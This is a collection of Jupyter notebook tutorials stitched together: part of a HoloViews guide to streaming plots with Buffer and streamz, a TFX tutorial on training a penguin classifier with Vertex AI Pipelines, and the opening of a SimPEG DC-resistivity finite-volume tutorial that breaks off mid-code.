The ability to accumulate data allows performing operations on a recent history of data, while plotting backends (such as bokeh) can optimize plot updates by sending just the latest patch. This optimization works only if the ``data`` object held by the ``Buffer`` is identical to the plotted ``Element`` data, otherwise all the data will be updated as normal.
#### A simple example: Brownian motion
To initialize a ``Buffer`` we have to provide an example dataset which defines the columns and dtypes of the data we will be streaming. Next we define the ``length`` to keep the last 100 rows of data. If the data is a DataFrame we can specify whether we will also want to use the ``DataFrame`` ``index``. In this case we will simply define that we want to plot a ``DataFrame`` of 'x' and 'y' positions and a 'count' as ``Points`` and ``Curve`` elements:
```
example = pd.DataFrame({'x': [], 'y': [], 'count': []}, columns=['x', 'y', 'count'])
dfstream = Buffer(example, length=100, index=False)
curve_dmap = hv.DynamicMap(hv.Curve, streams=[dfstream])
point_dmap = hv.DynamicMap(hv.Points, streams=[dfstream])
```
After applying some styling we will display an ``Overlay`` of the dynamic ``Curve`` and ``Points``
```
%%opts Points [color_index='count', xaxis=None, yaxis=None] (line_color='black', size=5)
%%opts Curve (line_width=1, color='black')
curve_dmap * point_dmap
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/brownian.gif"></img>
Now that we have set up the ``Buffer`` and defined a ``DynamicMap`` to plot the data we can start pushing data to it. We will define a simple function which simulates brownian motion by accumulating x, y positions. We can ``send`` data through the ``hv.streams.Buffer`` directly.
```
def gen_brownian():
x, y, count = 0, 0, 0
while True:
x += np.random.randn()
y += np.random.randn()
count += 1
yield pd.DataFrame([(x, y, count)], columns=['x', 'y', 'count'])
brownian = gen_brownian()
for i in range(200):
dfstream.send(next(brownian))
```
Finally we can clear the data on the stream and plot using the ``clear`` method:
```
dfstream.clear()
```
## Using the Streamz library
Now that we have discovered what ``Pipe`` and ``Buffer`` can do it's time to show how you can use them together with the ``streamz`` library. Although HoloViews does not depend on ``streamz`` and you can use the streaming functionality without needing to learn about it, the two libraries work well together, allowing you to build pipelines to manage continuous streams of data. Streamz is easy to use for simple tasks, but also supports complex pipelines that involve branching, joining, flow control, feedback and more. Here we will mostly focus on connecting streamz output to ``Pipe`` and then ``Buffer`` so for more details about the streamz API, consult the [streamz documentation](https://streamz.readthedocs.io/en/latest/).
#### Using ``streamz.Stream`` together with ``Pipe``
Let's start with a fairly simple example:
1. Declare a ``streamz.Stream`` and a ``Pipe`` object and connect them into a pipeline into which we can push data.
2. Use a ``sliding_window`` of 10, which will first wait for 10 sets of stream updates to accumulate. At that point and for every subsequent update, it will apply ``pd.concat`` to combine the most recent 10 updates into a new dataframe.
3. Use the ``sink`` method on the ``streamz.Stream`` to ``send`` the resulting collection of 10 updates to ``Pipe``.
4. Declare a ``DynamicMap`` that takes the sliding window of concatenated DataFrames and displays it using a ``Scatter`` Element.
5. Color the ``Scatter`` points by their 'count' and set a range, then display:
```
point_source = streamz.Stream()
pipe = Pipe(data=[])
point_source.sliding_window(20).map(pd.concat).sink(pipe.send) # Connect streamz to the Pipe
scatter_dmap = hv.DynamicMap(hv.Scatter, streams=[pipe])
```
After set up our streaming pipeline we can again display it:
```
%%opts Scatter [color_index='count', bgcolor='black']
scatter_dmap.redim.range(y=(-4, 4))
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz1.gif"></img>
There is now a pipeline, but initially this plot will be empty, because no data has been sent to it. To see the plot update, let's use the ``emit`` method of ``streamz.Stream`` to send small chunks of random pandas ``DataFrame``s to our plot:
```
for i in range(100):
df = pd.DataFrame({'x': np.random.rand(100), 'y': np.random.randn(100), 'count': i},
columns=['x', 'y', 'count'])
point_source.emit(df)
```
#### Using StreamingDataFrame and StreamingSeries
The streamz library provides ``StreamingDataFrame`` and ``StreamingSeries`` as a powerful way to easily work with live sources of tabular data. This makes it perfectly suited to work with ``Buffer``. With the ``StreamingDataFrame`` we can easily stream data, apply computations such as cumulative and rolling statistics and then visualize the data with HoloViews.
The ``streamz.dataframe`` module provides a ``Random`` utility that generates a ``StreamingDataFrame`` that emits random data with a certain frequency at a specified interval. The ``example`` attribute lets us see the structure and dtypes of the data we can expect:
```
simple_sdf = streamz.dataframe.Random(freq='10ms', interval='100ms')
print(simple_sdf.index)
simple_sdf.example.dtypes
```
Since the ``StreamingDataFrame`` provides a pandas-like API, we can specify operations on the data directly. In this example we subtract a fixed offset and then compute the cumulative sum, giving us a randomly drifting timeseries. We can then pass the x-values of this dataframe to the HoloViews ``Buffer`` and supply ``hv.Curve`` as the ``DynamicMap`` callback to stream the data into a HoloViews ``Curve`` (with the default key and value dimensions):
```
%%opts Curve [width=500 show_grid=True]
sdf = (simple_sdf-0.5).cumsum()
hv.DynamicMap(hv.Curve, streams=[Buffer(sdf.x)])
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz3.gif"></img>
The ``Random`` StreamingDataFrame will asynchronously emit events, driving the visualization forward, until it is explicitly stopped, which we can do by calling the ``stop`` method.
```
simple_sdf.stop()
```
#### Making use of the ``StreamingDataFrame`` API
So far we have only computed the cumulative sum, but the ``StreamingDataFrame`` actually has an extensive API that lets us run a broad range of streaming computations on our data. For example, let's apply a rolling mean to our x-values with a window of 500ms and overlay it on top of the 'raw' data:
```
%%opts Curve [width=500 show_grid=True]
source_df = streamz.dataframe.Random(freq='5ms', interval='100ms')
sdf = (source_df-0.5).cumsum()
raw_dmap = hv.DynamicMap(hv.Curve, streams=[Buffer(sdf.x)])
smooth_dmap = hv.DynamicMap(hv.Curve, streams=[Buffer(sdf.x.rolling('500ms').mean())])
raw_dmap.relabel('raw') * smooth_dmap.relabel('smooth')
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz4.gif"></img>
```
source_df.stop()
```
#### Customizing elements with ``functools.partial``
In this notebook we have avoided defining custom functions for ``DynamicMap`` by simply supplying the element class and using the element constructor instead. Although this works well for examples, it often won't generalize to real-life situations, because you don't have an opportunity to use anything other than the default dimensions. One simple way to get around this limitation is to use ``functools.partial``:
```
from functools import partial
```
Now you can now easily create an inline callable that creates an element with custom key and value dimensions by supplying them to ``partial`` in the form ``partial(hv.Element, kdims=[...], vdims=[...])``. In the next section, we will see an example of this pattern using ``hv.BoxWhisker``.
#### Controlling the length
By default the ``Buffer`` accumulates a ``length`` of 1000 samples. In many cases this may be excessive, but we can specify a shorter (or longer) length value to control how much history we accumulate, often depending on the element type.
In the following example, a custom ``length`` is used together with a ``partial`` wrapping ``hv.BoxWhisker`` in order to display a cumulative sum generated from a stream of random dataframes:
```
multi_source = streamz.dataframe.Random(freq='5ms', interval='100ms')
sdf = (multi_source-0.5).cumsum()
hv.DynamicMap(hv.Table, streams=[Buffer(sdf.x, length=10)]) +\
hv.DynamicMap(partial(hv.BoxWhisker, kdims=[], vdims='x'), streams=[Buffer(sdf.x, length=100)])
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz5.gif"></img>
Here the given stream ``sdf`` is being consumed by a table showing a short length (where only the items visible in the table need to be kept), along with a plot computing averages and variances over a longer length (100 items).
#### Updating multiple cells
Since a ``StreamingDataFrame`` will emit data until it is stopped, we can subscribe multiple plots across different cells to the same stream. Here, let's add a ``Scatter`` plot of the same data stream as in the preceding cell:
```
hv.DynamicMap(hv.Scatter, streams=[Buffer(sdf.x)]).redim.label(x='value', index='time')
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz6.gif"></img>
Here we let the ``Scatter`` elements use the column names from the supplied ``DataFrames`` which are relabelled using the ``redim`` method. Stopping the stream will now stop updates to all three of these DynamicMaps:
```
multi_source.stop()
```
## Operations over streaming data
As we discovered above, the ``Buffer`` lets us set a ``length``, which defines how many rows we want to accumulate. We can use this to our advantage and apply an operation over this length window. In this example we declare a ``Dataset`` and then apply the ``histogram`` operation to compute a ``Histogram`` over the specified ``length`` window:
```
hist_source = streamz.dataframe.Random(freq='5ms', interval='100ms')
sdf = (hist_source-0.5).cumsum()
dmap = hv.DynamicMap(hv.Dataset, streams=[Buffer(sdf.x, length=500)])
hv.operation.histogram(dmap, dimension='x')
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz7.gif"></img>
```
hist_source.stop()
```
#### Datashading
The same approach will also work for the datashader operation letting us datashade the entire ``length`` window even if we make it very large such as 1 million samples:
```
%%opts RGB [width=600]
from holoviews.operation.datashader import datashade
from bokeh.palettes import Blues8
large_source = streamz.dataframe.Random(freq='100us', interval='200ms')
sdf = (large_source-0.5).cumsum()
dmap = hv.DynamicMap(hv.Curve, streams=[Buffer(sdf.x, length=1000000)])
datashade(dmap, streams=[hv.streams.PlotSize], normalization='linear', cmap=Blues8)
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz8.gif"></img>
```
large_source.stop()
```
## Asynchronous updates using the tornado ``IOLoop``
In most cases, instead of pushing updates manually from the same Python process, you'll want the object to update asynchronously as new data arrives. Since both Jupyter and Bokeh server run on [tornado](http://www.tornadoweb.org/en/stable/), we can use the tornado ``IOLoop`` in both cases to define a non-blocking co-routine that can push data to our stream whenever it is ready. The ``PeriodicCallback`` makes this approach very simple, we simply define a function which will be called periodically with a timeout defined in milliseconds. Once we have declared the callback we can call ``start`` to begin emitting events:
```
%%opts Curve [width=600]
from tornado.ioloop import PeriodicCallback
from tornado import gen
count = 0
buffer = Buffer(np.zeros((0, 2)), length=50)
@gen.coroutine
def f():
global count
count += 1
buffer.send(np.array([[count, np.random.rand()]]))
cb = PeriodicCallback(f, 100)
cb.start()
hv.DynamicMap(hv.Curve, streams=[buffer]).redim.range(y=(0, 1))
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz2.gif"></img>
Since the callback is non-blocking we can continue working in the notebook and execute other cells. Once we're done we can stop the callback by calling ``cb.stop()``.
```
cb.stop()
```
## Real examples
Using the ``Pipe`` and ``Buffer`` streams we can create complex streaming plots very easily. In addition to the toy examples we presented in this guide it is worth looking at looking at some of the examples using real, live, streaming data.
* The [streaming_psutil](http://holoviews.org/gallery/apps/bokeh/stream_psutil.html) bokeh app is one such example which display CPU and memory information using the ``psutil`` library (install with ``pip install psutil`` or ``conda install psutil``)
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/streamz9.gif"></img>
As you can see, streaming data works like streams in HoloViews in general, flexibly handling changes over time under either explicit control or governed by some external data source.
| github_jupyter |
##### Copyright 2021 The TensorFlow Authors.
```
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
```
# Vertex AI Training with TFX and Vertex Pipelines
<div class="devsite-table-wrapper"><table class="tfo-notebook-buttons" align="left">
<td><a target="_blank" href="https://www.tensorflow.org/tfx/tutorials/tfx/gcp/vertex_pipelines_vertex_training">
<img src="https://www.tensorflow.org/images/tf_logo_32px.png"/>View on TensorFlow.org</a></td>
<td><a target="_blank" href="https://colab.research.google.com/github/tensorflow/tfx/blob/master/docs/tutorials/tfx/gcp/vertex_pipelines_vertex_training.ipynb">
<img src="https://www.tensorflow.org/images/colab_logo_32px.png">Run in Google Colab</a></td>
<td><a target="_blank" href="https://github.com/tensorflow/tfx/tree/master/docs/tutorials/tfx/gcp/vertex_pipelines_vertex_training.ipynb">
<img width=32px src="https://www.tensorflow.org/images/GitHub-Mark-32px.png">View source on GitHub</a></td>
<td><a href="https://storage.googleapis.com/tensorflow_docs/tfx/docs/tutorials/tfx/gcp/vertex_pipelines_vertex_training.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a></td>
<td><a href="https://console.cloud.google.com/mlengine/notebooks/deploy-notebook?q=download_url%3Dhttps%253A%252F%252Fraw.githubusercontent.com%252Ftensorflow%252Ftfx%252Fmaster%252Fdocs%252Ftutorials%252Ftfx%252Fgcp%252Fvertex_pipelines_vertex_training.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Run in Google Cloud AI Platform Notebook</a></td>
</table></div>
This notebook-based tutorial will create and run a TFX pipeline which trains an
ML model using Vertex AI Training service.
This notebook is based on the TFX pipeline we built in
[Simple TFX Pipeline for Vertex Pipelines Tutorial](https://www.tensorflow.org/tfx/tutorials/tfx/gcp/vertex_pipelines_simple).
If you have not read that tutorial yet, you should read it before proceeding
with this notebook.
You can train models on Vertex AI using AutoML, or use custom training. In
custom training, you can select many different machine types to power your
training jobs, enable distributed training, use hyperparameter tuning, and
accelerate with GPUs.
In this tutorial, we will use Vertex AI Training with custom jobs to train
a model in a TFX pipeline.
This notebook is intended to be run on
[Google Colab](https://colab.research.google.com/notebooks/intro.ipynb) or on
[AI Platform Notebooks](https://cloud.google.com/ai-platform-notebooks). If you
are not using one of these, you can simply click "Run in Google Colab" button
above.
## Set up
If you have completed
[Simple TFX Pipeline for Vertex Pipelines Tutorial](https://www.tensorflow.org/tfx/tutorials/tfx/gcp/vertex_pipelines_simple),
you will have a working GCP project and a GCS bucket and that is all we need
for this tutorial. Please read the preliminary tutorial first if you missed it.
### Install python packages
We will install required Python packages including TFX and KFP to author ML
pipelines and submit jobs to Vertex Pipelines.
```
# Use the latest version of pip.
!pip install --upgrade pip
!pip install --upgrade "tfx[kfp]<2"
```
#### Did you restart the runtime?
If you are using Google Colab, the first time that you run
the cell above, you must restart the runtime by clicking
above "RESTART RUNTIME" button or using "Runtime > Restart
runtime ..." menu. This is because of the way that Colab
loads packages.
If you are not on Colab, you can restart runtime with following cell.
```
# docs_infra: no_execute
import sys
if not 'google.colab' in sys.modules:
# Automatically restart kernel after installs
import IPython
app = IPython.Application.instance()
app.kernel.do_shutdown(True)
```
### Login in to Google for this notebook
If you are running this notebook on Colab, authenticate with your user account:
```
import sys
if 'google.colab' in sys.modules:
from google.colab import auth
auth.authenticate_user()
```
**If you are on AI Platform Notebooks**, authenticate with Google Cloud before
running the next section, by running
```sh
gcloud auth login
```
**in the Terminal window** (which you can open via **File** > **New** in the
menu). You only need to do this once per notebook instance.
Check the package versions.
```
import tensorflow as tf
print('TensorFlow version: {}'.format(tf.__version__))
from tfx import v1 as tfx
print('TFX version: {}'.format(tfx.__version__))
import kfp
print('KFP version: {}'.format(kfp.__version__))
```
### Set up variables
We will set up some variables used to customize the pipelines below. Following
information is required:
* GCP Project id. See
[Identifying your project id](https://cloud.google.com/resource-manager/docs/creating-managing-projects#identifying_projects).
* GCP Region to run pipelines. For more information about the regions that
Vertex Pipelines is available in, see the
[Vertex AI locations guide](https://cloud.google.com/vertex-ai/docs/general/locations#feature-availability).
* Google Cloud Storage Bucket to store pipeline outputs.
**Enter required values in the cell below before running it**.
```
GOOGLE_CLOUD_PROJECT = '' # <--- ENTER THIS
GOOGLE_CLOUD_REGION = '' # <--- ENTER THIS
GCS_BUCKET_NAME = '' # <--- ENTER THIS
if not (GOOGLE_CLOUD_PROJECT and GOOGLE_CLOUD_REGION and GCS_BUCKET_NAME):
from absl import logging
logging.error('Please set all required parameters.')
```
Set `gcloud` to use your project.
```
!gcloud config set project {GOOGLE_CLOUD_PROJECT}
PIPELINE_NAME = 'penguin-vertex-training'
# Path to various pipeline artifact.
PIPELINE_ROOT = 'gs://{}/pipeline_root/{}'.format(GCS_BUCKET_NAME, PIPELINE_NAME)
# Paths for users' Python module.
MODULE_ROOT = 'gs://{}/pipeline_module/{}'.format(GCS_BUCKET_NAME, PIPELINE_NAME)
# Paths for users' data.
DATA_ROOT = 'gs://{}/data/{}'.format(GCS_BUCKET_NAME, PIPELINE_NAME)
# This is the path where your model will be pushed for serving.
SERVING_MODEL_DIR = 'gs://{}/serving_model/{}'.format(
GCS_BUCKET_NAME, PIPELINE_NAME)
print('PIPELINE_ROOT: {}'.format(PIPELINE_ROOT))
```
### Prepare example data
We will use the same
[Palmer Penguins dataset](https://allisonhorst.github.io/palmerpenguins/articles/intro.html)
as
[Simple TFX Pipeline Tutorial](https://www.tensorflow.org/tfx/tutorials/tfx/penguin_simple).
There are four numeric features in this dataset which were already normalized
to have range [0,1]. We will build a classification model which predicts the
`species` of penguins.
We need to make our own copy of the dataset. Because TFX ExampleGen reads
inputs from a directory, we need to create a directory and copy dataset to it
on GCS.
```
!gsutil cp gs://download.tensorflow.org/data/palmer_penguins/penguins_processed.csv {DATA_ROOT}/
```
Take a quick look at the CSV file.
```
!gsutil cat {DATA_ROOT}/penguins_processed.csv | head
```
## Create a pipeline
Our pipeline will be very similar to the pipeline we created in
[Simple TFX Pipeline for Vertex Pipelines Tutorial](https://www.tensorflow.org/tfx/tutorials/tfx/gcp/vertex_pipelines_simple).
The pipeline will consists of three components, CsvExampleGen, Trainer and
Pusher. But we will use a special Trainer component which is used to move
training workloads to Vertex AI.
TFX provides a special `Trainer` to submit training jobs to Vertex AI Training
service. All we have to do is use `Trainer` in the extension module
instead of the standard `Trainer` component along with some required GCP
parameters.
In this tutorial, we will run Vertex AI Training jobs only using CPUs first
and then with a GPU.
### Write model code.
The model itself is almost similar to the model in
[Simple TFX Pipeline Tutorial](https://www.tensorflow.org/tfx/tutorials/tfx/penguin_simple).
We will add `_get_distribution_strategy()` function which creates a
[TensorFlow distribution strategy](https://www.tensorflow.org/guide/distributed_training)
and it is used in `run_fn` to use MirroredStrategy if GPU is available.
```
_trainer_module_file = 'penguin_trainer.py'
%%writefile {_trainer_module_file}
# Copied from https://www.tensorflow.org/tfx/tutorials/tfx/penguin_simple and
# slightly modified run_fn() to add distribution_strategy.
from typing import List
from absl import logging
import tensorflow as tf
from tensorflow import keras
from tensorflow_metadata.proto.v0 import schema_pb2
from tensorflow_transform.tf_metadata import schema_utils
from tfx import v1 as tfx
from tfx_bsl.public import tfxio
_FEATURE_KEYS = [
'culmen_length_mm', 'culmen_depth_mm', 'flipper_length_mm', 'body_mass_g'
]
_LABEL_KEY = 'species'
_TRAIN_BATCH_SIZE = 20
_EVAL_BATCH_SIZE = 10
# Since we're not generating or creating a schema, we will instead create
# a feature spec. Since there are a fairly small number of features this is
# manageable for this dataset.
_FEATURE_SPEC = {
**{
feature: tf.io.FixedLenFeature(shape=[1], dtype=tf.float32)
for feature in _FEATURE_KEYS
}, _LABEL_KEY: tf.io.FixedLenFeature(shape=[1], dtype=tf.int64)
}
def _input_fn(file_pattern: List[str],
data_accessor: tfx.components.DataAccessor,
schema: schema_pb2.Schema,
batch_size: int) -> tf.data.Dataset:
"""Generates features and label for training.
Args:
file_pattern: List of paths or patterns of input tfrecord files.
data_accessor: DataAccessor for converting input to RecordBatch.
schema: schema of the input data.
batch_size: representing the number of consecutive elements of returned
dataset to combine in a single batch
Returns:
A dataset that contains (features, indices) tuple where features is a
dictionary of Tensors, and indices is a single Tensor of label indices.
"""
return data_accessor.tf_dataset_factory(
file_pattern,
tfxio.TensorFlowDatasetOptions(
batch_size=batch_size, label_key=_LABEL_KEY),
schema=schema).repeat()
def _make_keras_model() -> tf.keras.Model:
"""Creates a DNN Keras model for classifying penguin data.
Returns:
A Keras Model.
"""
# The model below is built with Functional API, please refer to
# https://www.tensorflow.org/guide/keras/overview for all API options.
inputs = [keras.layers.Input(shape=(1,), name=f) for f in _FEATURE_KEYS]
d = keras.layers.concatenate(inputs)
for _ in range(2):
d = keras.layers.Dense(8, activation='relu')(d)
outputs = keras.layers.Dense(3)(d)
model = keras.Model(inputs=inputs, outputs=outputs)
model.compile(
optimizer=keras.optimizers.Adam(1e-2),
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=[keras.metrics.SparseCategoricalAccuracy()])
model.summary(print_fn=logging.info)
return model
# NEW: Read `use_gpu` from the custom_config of the Trainer.
# if it uses GPU, enable MirroredStrategy.
def _get_distribution_strategy(fn_args: tfx.components.FnArgs):
if fn_args.custom_config.get('use_gpu', False):
logging.info('Using MirroredStrategy with one GPU.')
return tf.distribute.MirroredStrategy(devices=['device:GPU:0'])
return None
# TFX Trainer will call this function.
def run_fn(fn_args: tfx.components.FnArgs):
"""Train the model based on given args.
Args:
fn_args: Holds args used to train the model as name/value pairs.
"""
# This schema is usually either an output of SchemaGen or a manually-curated
# version provided by pipeline author. A schema can also derived from TFT
# graph if a Transform component is used. In the case when either is missing,
# `schema_from_feature_spec` could be used to generate schema from very simple
# feature_spec, but the schema returned would be very primitive.
schema = schema_utils.schema_from_feature_spec(_FEATURE_SPEC)
train_dataset = _input_fn(
fn_args.train_files,
fn_args.data_accessor,
schema,
batch_size=_TRAIN_BATCH_SIZE)
eval_dataset = _input_fn(
fn_args.eval_files,
fn_args.data_accessor,
schema,
batch_size=_EVAL_BATCH_SIZE)
# NEW: If we have a distribution strategy, build a model in a strategy scope.
strategy = _get_distribution_strategy(fn_args)
if strategy is None:
model = _make_keras_model()
else:
with strategy.scope():
model = _make_keras_model()
model.fit(
train_dataset,
steps_per_epoch=fn_args.train_steps,
validation_data=eval_dataset,
validation_steps=fn_args.eval_steps)
# The result of the training should be saved in `fn_args.serving_model_dir`
# directory.
model.save(fn_args.serving_model_dir, save_format='tf')
```
Copy the module file to GCS which can be accessed from the pipeline components.
Otherwise, you might want to build a container image including the module file
and use the image to run the pipeline and AI Platform Training jobs.
```
!gsutil cp {_trainer_module_file} {MODULE_ROOT}/
```
### Write a pipeline definition
We will define a function to create a TFX pipeline. It has the same three
Components as in
[Simple TFX Pipeline Tutorial](https://www.tensorflow.org/tfx/tutorials/tfx/penguin_simple),
but we use a `Trainer` component in the GCP extension module.
`tfx.extensions.google_cloud_ai_platform.Trainer` behaves like a regular
`Trainer`, but it just moves the computation for the model training to cloud.
It launches a custom job in Vertex AI Training service and the trainer
component in the orchestration system will just wait until the Vertex AI
Training job completes.
```
def _create_pipeline(pipeline_name: str, pipeline_root: str, data_root: str,
module_file: str, serving_model_dir: str, project_id: str,
region: str, use_gpu: bool) -> tfx.dsl.Pipeline:
"""Implements the penguin pipeline with TFX."""
# Brings data into the pipeline or otherwise joins/converts training data.
example_gen = tfx.components.CsvExampleGen(input_base=data_root)
# NEW: Configuration for Vertex AI Training.
# This dictionary will be passed as `CustomJobSpec`.
vertex_job_spec = {
'project': project_id,
'worker_pool_specs': [{
'machine_spec': {
'machine_type': 'n1-standard-4',
},
'replica_count': 1,
'container_spec': {
'image_uri': 'gcr.io/tfx-oss-public/tfx:{}'.format(tfx.__version__),
},
}],
}
if use_gpu:
# See https://cloud.google.com/vertex-ai/docs/reference/rest/v1/MachineSpec#acceleratortype
# for available machine types.
vertex_job_spec['worker_pool_specs'][0]['machine_spec'].update({
'accelerator_type': 'NVIDIA_TESLA_K80',
'accelerator_count': 1
})
# Trains a model using Vertex AI Training.
# NEW: We need to specify a Trainer for GCP with related configs.
trainer = tfx.extensions.google_cloud_ai_platform.Trainer(
module_file=module_file,
examples=example_gen.outputs['examples'],
train_args=tfx.proto.TrainArgs(num_steps=100),
eval_args=tfx.proto.EvalArgs(num_steps=5),
custom_config={
tfx.extensions.google_cloud_ai_platform.ENABLE_UCAIP_KEY:
True,
tfx.extensions.google_cloud_ai_platform.UCAIP_REGION_KEY:
region,
tfx.extensions.google_cloud_ai_platform.TRAINING_ARGS_KEY:
vertex_job_spec,
'use_gpu':
use_gpu,
})
# Pushes the model to a filesystem destination.
pusher = tfx.components.Pusher(
model=trainer.outputs['model'],
push_destination=tfx.proto.PushDestination(
filesystem=tfx.proto.PushDestination.Filesystem(
base_directory=serving_model_dir)))
components = [
example_gen,
trainer,
pusher,
]
return tfx.dsl.Pipeline(
pipeline_name=pipeline_name,
pipeline_root=pipeline_root,
components=components)
```
## Run the pipeline on Vertex Pipelines.
We will use Vertex Pipelines to run the pipeline as we did in
[Simple TFX Pipeline for Vertex Pipelines Tutorial](https://www.tensorflow.org/tfx/tutorials/tfx/gcp/vertex_pipelines_simple).
```
import os
PIPELINE_DEFINITION_FILE = PIPELINE_NAME + '_pipeline.json'
runner = tfx.orchestration.experimental.KubeflowV2DagRunner(
config=tfx.orchestration.experimental.KubeflowV2DagRunnerConfig(),
output_filename=PIPELINE_DEFINITION_FILE)
_ = runner.run(
_create_pipeline(
pipeline_name=PIPELINE_NAME,
pipeline_root=PIPELINE_ROOT,
data_root=DATA_ROOT,
module_file=os.path.join(MODULE_ROOT, _trainer_module_file),
serving_model_dir=SERVING_MODEL_DIR,
project_id=GOOGLE_CLOUD_PROJECT,
region=GOOGLE_CLOUD_REGION,
# We will use CPUs only for now.
use_gpu=False))
```
The generated definition file can be submitted using kfp client.
```
# docs_infra: no_execute
from kfp.v2.google import client
pipelines_client = client.AIPlatformClient(
project_id=GOOGLE_CLOUD_PROJECT,
region=GOOGLE_CLOUD_REGION,
)
_ = pipelines_client.create_run_from_job_spec(PIPELINE_DEFINITION_FILE)
```
Now you can visit the link in the output above or visit
'Vertex AI > Pipelines' in
[Google Cloud Console](https://console.cloud.google.com/) to see the
progress.
### Run the pipeline using a GPU
Vertex AI supports training using various machine types including support for
GPUs. See
[Machine spec reference](https://cloud.google.com/vertex-ai/docs/reference/rest/v1/MachineSpec#acceleratortype)
for available options.
We already defined our pipeline to support GPU training. All we need to do is
setting `use_gpu` flag to True. Then a pipeline will be created with a machine
spec including one NVIDIA_TESLA_K80 and our model training code will use
`tf.distribute.MirroredStrategy`.
Note that `use_gpu` flag is not a part of the Vertex or TFX API. It is just
used to control the training code in this tutorial.
```
# docs_infra: no_execute
runner.run(
_create_pipeline(
pipeline_name=PIPELINE_NAME,
pipeline_root=PIPELINE_ROOT,
data_root=DATA_ROOT,
module_file=os.path.join(MODULE_ROOT, _trainer_module_file),
serving_model_dir=SERVING_MODEL_DIR,
project_id=GOOGLE_CLOUD_PROJECT,
region=GOOGLE_CLOUD_REGION,
# Updated: Use GPUs. We will use a NVIDIA_TESLA_K80 and
# the model code will use tf.distribute.MirroredStrategy.
use_gpu=True))
_ = pipelines_client.create_run_from_job_spec(PIPELINE_DEFINITION_FILE)
```
Now you can visit the link in the output above or visit
'Vertex AI > Pipelines' in
[Google Cloud Console](https://console.cloud.google.com/) to see the
progress.
| github_jupyter |
# Pixels and their neighbours: Finite volume
*Rowan Cockett, Lindsey Heagy and Doug Oldenburg*
This notebook uses [Python 2.7](https://docs.python.org/2/) and the open source package [SimPEG](http://simpeg.xyz). [SimPEG](http://simpeg.xyz) can be installed using the python package manager PyPi and running:
```
pip install SimPEG
```
Alternatively, these notebooks can be run on the web using binders
[](http://mybinder.org:/repo/simpeg/tle-finitevolume)
This tutorial consists of 3 parts, here, we introduce the problem, in [divergence.ipynb](divergence.ipynb) we build the discrete divergence operator and in [weakformulation.ipynb](weakformulation.ipynb), we discretize and solve the DC equations using weak formulation.
**Contents**
- [DC Resistivity setup](#DC-Resistivity)
- [mesh](mesh.ipynb)
- [divergence](divergence.ipynb)
- [weakforulation](weakformulation.ipynb)
- [all together now](all_together_now.ipynb)
# DC Resistivity
<img src="./images/DCSurvey.png" width=60% align="center">
<h4 align="center"> Figure 1. Setup of a DC resistivity survey.</h4>
DC resistivity surveys obtain information about subsurface electrical conductivity, $\sigma$. This physical property is often diagnostic in mineral exploration, geotechnical, environmental and hydrogeologic problems, where the target of interest has a significant electrical conductivity contrast from the background. In a DC resistivity survey, steady state currents are set up in the subsurface by injecting current through a positive electrode and completing the circuit with a return electrode.
## Deriving the DC equations
<img src="images/DCEquations.png" width=70% align="center">
<h4 align="center">Figure 2. Derivation of the DC resistivity equations</h4>
Conservation of charge (which can be derived by taking the divergence of Ampere’s law at steady state) connects the divergence of the current density everywhere in space to the source term which consists of two point sources, one positive and one negative. The flow of current sets up electric fields according to Ohm’s law, which relates current density to electric fields through the electrical conductivity. From Faraday’s law for steady state fields, we can describe the electric field in terms of a scalar potential, $\phi$, which we sample at potential electrodes to obtain data in the form of potential differences.
## The finish line
*Where are we going??*
Here, we are going to do a run through of how to setup and solve the DC resistivity equations for a 2D problem using [SimPEG](http://simpeg.xyz). This is meant to give you a once-over of the whole picture. We will break down the steps to get here in the series of notebooks that follow...
```
# Import numpy, python's n-dimensional array package,
# the mesh class with differential operators from SimPEG
# matplotlib, the basic python plotting package
import numpy as np
from SimPEG import Mesh, Utils
import matplotlib.pyplot as plt
%matplotlib inline
plt.set_cmap(plt.get_cmap('viridis')) # use a nice colormap!
```
### Mesh
Where we solve things! See [mesh.ipynb](mesh.ipynb) a discussion of how we construct a mesh and the associated properties we need.
```
# Define a unit-cell mesh
mesh = Mesh.TensorMesh([100, 80]) # setup a mesh on which to solve
print("The mesh has {nC} cells.".format(nC=mesh.nC))
mesh.plotGrid()
plt.axis('tight');
```
### Physical Property Model
Define an electrical conductivity ($\sigma$) model, on the cell-centers of the mesh.
```
# model parameters
sigma_background = 1. # Conductivity of the background, S/m
sigma_block = 10. # Conductivity of the block, S/m
# add a block to our model
x_block = np.r_[0.4, 0.6]
y_block = np.r_[0.4, 0.6]
# assign them on the mesh
sigma = sigma_background * np.ones(mesh.nC) # create a physical property model
block_indices = ((mesh.gridCC[:,0] >= x_block[0]) & # left boundary
(mesh.gridCC[:,0] <= x_block[1]) & # right boundary
(mesh.gridCC[:,1] >= y_block[0]) & # bottom boundary
(mesh.gridCC[:,1] <= y_block[1])) # top boundary
# add the block to the physical property model
sigma[block_indices] = sigma_block
# plot it!
plt.colorbar(mesh.plotImage(sigma)[0])
plt.title('electrical conductivity, $\sigma$')
```
### Define a source
Define location of the positive and negative electrodes
```
# Define a source
a_loc, b_loc = np.r_[0.2, 0.5], np.r_[0.8, 0.5]
source_locs = [a_loc, b_loc]
# locate it on the mesh
